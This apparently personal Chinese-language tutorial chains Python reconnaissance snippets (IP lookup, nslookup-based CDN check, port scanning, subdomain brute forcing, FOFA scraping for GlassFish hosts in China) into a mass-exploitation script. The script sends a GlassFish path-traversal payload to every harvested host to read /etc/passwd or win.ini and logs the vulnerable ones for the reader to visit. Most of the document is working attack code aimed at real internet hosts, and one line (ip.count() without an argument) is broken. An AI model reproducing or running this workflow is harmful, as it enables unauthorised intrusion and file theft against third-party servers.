python信息搜集
信息搜集
查询ip:
ip=socket.getaddrinfo(url,'http')
判断cdn:
#py 调用系统命令
cdn_data=os.popen("nslookup "+url)
cdn_data=cdn_data.read()
x=cdn_data.count(('.'))#根据.的个数判断
端口扫描:
#自写socket协议tcp,udp扫描
#可能出现判断有误
def port_scan(url):
ports = {20, 21, 22, 23, 25, 69, 79, 80, 88, 110, 113, 119, 220, 443, 456, 513, 544, 548, 553, 555, 568, 569, 635,636, 666, 993, 1001, 1011}
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
for port in ports :
result = server.connect_ex((url,port))
if result==0:
print(port,'|open')
else:
print(port,'|close')
查询子域名
def zym_check(url):
#字典扫描
for zym in open('dic.txt'):
zym=zym.replace('\n','')
zym_url=zym+'.'+url
try:
#根据域名查ip,查到则有
ip=socket.gethostbyname(zym_url)
print(zym_url+" ->"+ip)
time.sleep(0.1)
except Exception as e:
pass
fofa
import requests
import base64
from lxml import etree
fofa='https://fofa.info/result?qbase64='
#qbase64查询内容base64加密
search='"glassfish" && port="4848" && country="CN"'
#必须带有cookie才可以查询
header={
'Cookie': 'cookies',
}
search=str(base64.b64encode(search.encode('utf-8')),"utf-8")# base 64
size=20
for page in range(1,10):
result=requests.get((fofa+search+'&page='+str(page)),headers=header).content.decode('utf-8')
soup=etree.HTML(result)
ips=soup.xpath('//a[@target="_blank"]/@href')
ipdata='\n'.join(ips)
with open(r'ip.txt','a+') as f:
#查询的结果写入文件
f.write(ipdata+'\n')
f.close()
读取文件并判断是否存在漏洞
import requests
import urllib3
urllib3.disable_warnings()
import time
for ip in open('ip.txt'):
ip=ip.replace('\n','')
if ip.count()==0:
continue
payload_windows = ip + '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
payload_linux = ip + '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
data_linux_code = requests.get(payload_linux,verify=False).status_code
time.sleep(0.1)
data_windows_code = requests.get(payload_windows,verify=False).status_code
time.sleep(0.1)
if data_linux_code == 200 or data_windows_code == 200:
print(ip)
with open(r'vuln.txt', 'a+') as f:
f.write(ip+'\n')
vuln.txt中寻找有问题的网站,访问即可